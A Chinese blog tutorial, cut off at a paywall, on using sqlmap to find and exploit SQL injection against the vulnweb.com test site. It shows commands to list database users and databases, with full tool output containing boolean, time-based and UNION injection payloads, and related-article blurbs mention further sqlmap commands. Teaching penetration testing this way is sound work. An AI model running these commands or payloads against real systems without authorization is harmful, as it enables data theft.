sql注入漏洞--sqlmap使用

最新推荐文章于 2024-05-13 03:32:26 发布
最新推荐文章于 2024-05-13 03:32:26 发布
阅读量2.5k 收藏 6
点赞数 11
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43710889/article/details/117962697
版权
本文介绍了如何使用sqlmap工具进行SQL注入漏洞的检测和利用。首先,你需要找到存在数据库交互的页面,然后通过一系列命令判断是否存在SQL注入。在实战部分,针对GET和POST请求,给出了详细的操作步骤,包括查看当前用户和数据库、获取表信息、读取数据等。通过这些命令,可以读取并导出目标系统的重要数据。
摘要由CSDN通过智能技术生成

文章目录

sql注入漏洞–sqlmap使用

sqlmap工具获取:

基于python,需要有python环境

https://sqlmap.org/

基本流程:

  • 1.找到有数据库交互的功能页面
  • 2.判断页面是否存在sql注入
  • 3.利用sql注入漏洞读取数据
  • 4.导出所需数据保存

实战

http://testphp.vulnweb.com/artists.php?artist=1

在这里插入图片描述

get请求

命令:python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users

        ___
       __H__
 ___ ___[)]_____ ___ ___  {
  1.5.5.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:18 /2021-06-16/

[16:15:19] [INFO] resuming back-end DBMS 'mysql'
[16:15:19] [INFO] testing connection to the target URL
[16:15:20] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:15:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[16:15:20] [INFO] fetching database users
          
          
++++++++++++++++++++++++++++++++++++++hear!!!++++++++++++++++++++++++++++
database management system users [1]:
[*] 'acuart'@'localhost'
++++++++++++++++++++++++++++++++++++++hear!!!++++++++++++++++++++++++++++
          
          
[16:15:20] [INFO] fetched data logged to text files under 'C:\Users\Lenovo\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 16:15:20 /2021-06-16/

命令:python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

       ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.5.1#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:02 /2021-06-16/

[16:15:02] [INFO] resuming back-end DBMS 'mysql'
[16:15:02] [INFO] testing connection to the target URL
[16:15:03] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[16:15:03] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:15:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[16:15:03] [INFO] fetching database names
[16:15:04] [WARNING] the SQL query provided does not return any output
[16:15:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:15:04] [INFO] fetching number of databases
[16:15:04] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:15:04] [INFO] retrieved: 0
[16:15:07] [ERROR] unable to retrieve the number of databases
[16:15:07] [INFO] falling back to current database
[16:15:07] [INFO] fetching current database



+++++++++++++++++++++++++++++++++++++++++hear!!!!!++++++++++++++++++++++++++++++++++++++
available databases [1]:
[*] acuart
+++++++++++++++++++++++++++++++++++++++++hear!!!!!++++++++&#
最低0.47元/天 解锁文章
南岸青栀*
关注
  • 11
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
php mysql注入靶机_六步骤活用SQLMap(以testphp.vulnweb.com为测试靶机)
weixin_42477505的博客
02-02 1080
1、搭建Python 2.7.X 和SQLmap环境;2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“http://testphp.vulnweb.com/artists.php?artist=1”;3、使用sqlmap 获取当前数据库名称sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-...
sqlmap使用
2303_79648801的博客
04-10 433
-auth-type= http认证类型(Basic,NTLM,Digest)--keep-alive 建立长久的HTTP(S)连接 (与--proxy不兼容)--dump-format= 储存数据的方式(CSV(default),HTML,SQLITE)--drop-set-cookie 扔掉response中的set-cookie头。
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 3846
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
SQLmap使用教程图文教程(超详细)
最新发布
2401_84969692的博客
05-13 1410
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
针对POST型表单注入时sqlmap验证的三种参数
weixin_44023403的博客
04-12 5232
针对POST型表单注入时sqlmap验证的三种参数一、知识储备二、验证漏洞的三种参数1:--data2:-r3:--forms 一、知识储备 针对post型的表单,sqlmap有三种参数可验证: –data 需要自己手工找到参数名以及一些信息 -r 需要自己抓包 –forms sqlmap中的自动抓包获取参数,最方便 二、验证漏洞的三种参数 这里借助sqli-labs靶场的less11,来针对post表单注入,用sqlmap进行验证; 首先打开less11; 提交任意数据,用burp抓包; 记下p
Sqlmap常用命令总结及注入实战(Access、mysql)
上善若水~的博客
05-14 1057
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1.   sqlmap -u  “http://www.xx.com?id=x”    【查询是否存在注入点 –dbs         【检测站点包含哪些数据库 3.     --curre
渗透测试基础篇——sqlmap,nmap,burp工具使用
kreas的博客
05-31 1434
源系统向目标系统发一个 syn 请求,请求中包含一个端口号,如果目标端口开启,目标系统通过 syn/ack 来响应源系统,源系统通过 rst 响应目标系统,来断开连接。可以选择主动扫描或者被动扫描,主动扫描过程中会发送新的请求 payload 验证漏洞,被动扫描时 bp 不会重新发送请求,在已经存在的请求和应答分析。使用 FIN 进行测试,T 表示扫描过程中的时序(0-5),值越高扫描速度越快,容易被防火墙屏蔽。主动扫描:xss,http 头注入,重定向,sql 注入,命令行注入,文件遍历、
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞并利用它们。在本实验中,我们将用sqlmap对DVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可访问的数据库,`sqlmap -D dbName --tables`查看数据库中的表,`sqlmap -D dbName -T tableName ...
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
SQL注入漏洞SQLmap工具】 SQL注入是一种常见的网络安全漏洞,攻击者通过在Web表单中插入恶意SQL语句,欺骗服务器执行非预期的数据库操作。这种漏洞可能导致数据泄露、非法权限获取,甚至整个数据库系统的瘫痪。...
sql注入扫描_sqlmap-1.1.3.zip
02-13
SQLMap是一款强大的自动化SQL注入工具,它可以帮助安全研究人员或者渗透测试人员检测网站是否存在SQL注入漏洞。在版本sqlmap-1.1.3中,该工具已经兼容Python3,这扩大了它的使用范围,因为Python3逐渐成为主流的编程...
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读写文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及时发现和响应内网攻击至关重要。企图告警需排查:当发出告警信号时,需要仔细排查可能的企图行为。不仅要关注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
SqlMap用户手册
ludx212的专栏
06-10 1287
SqlMap用户手册 转自 投稿者:梧桐雨 发表于:2013-07-28   点击:13,549 引:本文已经出了续篇,文章内容有点长,但都是精华,读者们耐心的看吧,续篇的链接在文末。 1 http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,
解决sqlmap报错:[CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
热门推荐
茶花语的博客
03-11 1万+
解决sqlmap报错:[CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
sqlmap工具与sql注入漏洞测试
feinifi的博客
05-10 2972
sql注入是我们在开发与面试中经常听到的一个词语,它利用sql语句本身执行的特点,加入一些特定的语句拼接,骗过sql编译,最后执行,结果就出现意想不到的情况。 我在之前的工作中并不了解sqlmap,直到有一次,安全团队给我们发了很多安全漏洞的邮件,这些都是需要修复的,并报告给他们,然后他们复测,没有问题,这些安全问题才能被清理。 在我看的安全漏洞信息描述的截图里面,我看到一个关于sqlmap的执行命令,当时怀着好奇的心理去了解了一下这个东西,发现其实就是用来做sql注入检测的。 ...
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1249
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
SQLmap在进行SQL注入时的整个流程
dust_hk的博客
08-06 8234
文章转自信安之路,作者:sher10ck 很多小伙伴在发现或者判断出注入的时候,大多数选择就是直接上 sqlmap,结果往往也不尽人意,于是就有想法来写写 sqlmap 从执行到判断注入,到底发生了什么? 本文就用我们看的见的角度来分析,看看 sqlmap 到底发送了什么 payload,这些 payload 是怎么出来的,不深入代码层面。 技术有限,若有错误指出来,感激不尽。 测试环境 sqlm...
mysql sqlmap注入_使用sqlmap进行MySQL注入并渗透某服务器
weixin_42511517的博客
02-26 796
本文作者:simeon本文属于安全脉搏原创金币奖励计划文章,sqlmap功能强大,在某些情况下,通过SQL注入可以直接获取webshell权限,甚至可以获取Windows或者Linux服务器权限。下面以一个实际案例来介绍如何获取服务器权限。1、检测SQL注入SQL注入点可以通过扫描软件扫描,手工测试以及读取代码来判断,一旦发现存在SQL注入,可以直接进行检测,如图1所示,执行:sqlmap.py...
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全...SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

南岸青栀*

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值